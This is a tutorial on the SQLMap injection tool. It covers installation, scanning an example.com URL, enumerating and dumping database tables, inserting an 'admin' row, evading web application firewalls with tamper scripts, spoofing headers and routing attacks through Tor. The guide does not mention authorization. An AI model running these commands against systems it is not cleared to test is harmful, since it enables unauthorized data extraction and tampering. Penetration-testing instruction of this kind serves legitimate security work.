SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. It supports a wide range of database management systems (DBMS) including MySQL, PostgreSQL, Oracle, MSSQL, and more. SQLMap offers an array of features, such as database fingerprinting, data extraction, and access to the underlying operating system.
This guide covers SQLMap’s installation, configuration, and usage in detail, including advanced techniques and troubleshooting.
Table of Contents
- Installation
- Basic Usage
- Advanced Usage
- Database Enumeration
- Data Extraction
- Writing to Database
- Advanced SQL Injection Techniques
- Bypassing Common Security Measures
- Automating SQLMap
- Using Proxy and Tor
- Logging and Output
- Troubleshooting
1. Installation
SQLMap is compatible with most operating systems, including Windows, Linux, and macOS. It requires Python 3.x to run.
Installation Steps
- Clone the SQLMap repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
- Navigate to the SQLMap directory:
cd sqlmap-dev
- Verify installation: Run SQLMap’s help command to verify successful installation:
python3 sqlmap.py -h
Installation via Package Managers
On some systems, SQLMap can be installed directly through package managers. For example, on Debian-based systems:
sudo apt install sqlmap
2. Basic Usage
SQLMap operates by testing specific URLs to determine if they are vulnerable to SQL injection attacks.
2.1 Basic Scan for SQL Injection
A simple scan requires the -u option followed by the target URL:
python3 sqlmap.py -u "
http://example.com/index.php?id=1"
SQLMap will automatically detect potential SQL injection points, test them, and report back with findings.
2.2 Selecting Injection Point
SQLMap allows you to specify particular parameters with -p to check for SQL injection. For example:
python3 sqlmap.py -u "
http://example.com/index.php" -p id
This will focus the SQL injection attempts on the id parameter.
3. Advanced Usage
SQLMap provides powerful capabilities beyond basic detection. Below are advanced options for data extraction, database enumeration, and interacting with database systems.
3.1 Database Enumeration
To enumerate the databases on the target server, use:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" --dbs
3.2 Enumerate Tables
To list tables within a specific database:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" -D database_name --tables
Replace database_name with the name of the database.
To extract all data from a specific table:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" -D database_name -T table_name --dump
SQLMap will export the contents of the specified table.
3.4 Writing to Database
SQLMap allows you to insert, update, and delete data within a database. For example, to insert a row into a table:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" --sql-query "INSERT INTO users (username, password) VALUES ('admin', 'password')"
4. Advanced SQL Injection Techniques
SQLMap supports a wide range of SQL injection techniques, including but not limited to:
- Boolean-based Blind: Test for injection by sending queries that return true or false based on the existence of the vulnerability.
- Time-based Blind: Send queries that induce delays to determine vulnerabilities without returning data.
- Error-based: Leverage database error messages to extract data.
- Union-based: Use UNION SQL statements to fetch data.
To specify a technique, use the --technique option:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" --technique=U
Options:
- B: Boolean-based blind
- T: Time-based blind
- U: Union-based
- E: Error-based
For example, to use only Union-based SQL injection:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" --technique=U
5. Bypassing Common Security Measures
5.1 WAF Bypass
SQLMap includes various techniques to bypass Web Application Firewalls (WAF). Use the --tamper option with scripts that alter the payload format:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" --tamper=space2comment
Some common tamper scripts include:
- space2comment: Changes spaces to comments.
- charencode: Encodes the payload.
- between: Uses BETWEEN instead of equality operators.
5.2 Custom User-Agent and Headers
Many websites block requests based on headers. To modify the User-Agent:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" --user-agent="Mozilla/5.0"
To add custom headers:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" --headers="X-Forwarded-For: 127.0.0.1"
6. Automating SQLMap
6.1 Batch Mode
To run SQLMap without prompts for user interaction, use the -batch option:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" --batch
6.2 Running from a List of URLs
SQLMap can automate scans for multiple URLs using the -m option:
python3 sqlmap.py -m list_of_urls.txt
Each URL in the list_of_urls.txt file will be scanned sequentially.
7. Using Proxy and Tor
SQLMap supports proxy connections, which can be used for anonymity or to bypass network restrictions.
7.1 Using an HTTP Proxy
To route traffic through a proxy, use the --proxy option:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" --proxy="
http://127.0.0.1:8080"
7.2 Using Tor
To use Tor for increased anonymity:
- Start the Tor service on your machine.
- Route SQLMap traffic through Tor:
python3 sqlmap.py -u "http://example.com/index.php?id=1" --tor
8. Logging and Output
SQLMap provides options to save output for later review.
8.1 Saving Results to File
To save SQLMap’s output to a text file:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" -o > output.txt
8.2 Verbose Mode
To increase verbosity and view more detailed logs:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" -v 3
Verbosity levels:
- 0: Show only the output
- 1: Show information output
- 2: Show debug information
- 3: Show detailed debug information
9. Troubleshooting
Common Errors and Solutions
- Target is not responding: Check network connectivity and ensure the server is reachable.
- WAF blocking requests: Use tamper scripts or change User-Agent headers.
- Too many false positives: Use SQLMap’s filtering options or specify injection techniques more narrowly.
Debugging
For additional debug information, use the -v flag with level 3:
python3 sqlmap.py -u "
http://example.com/index.php?id=1" -v 3
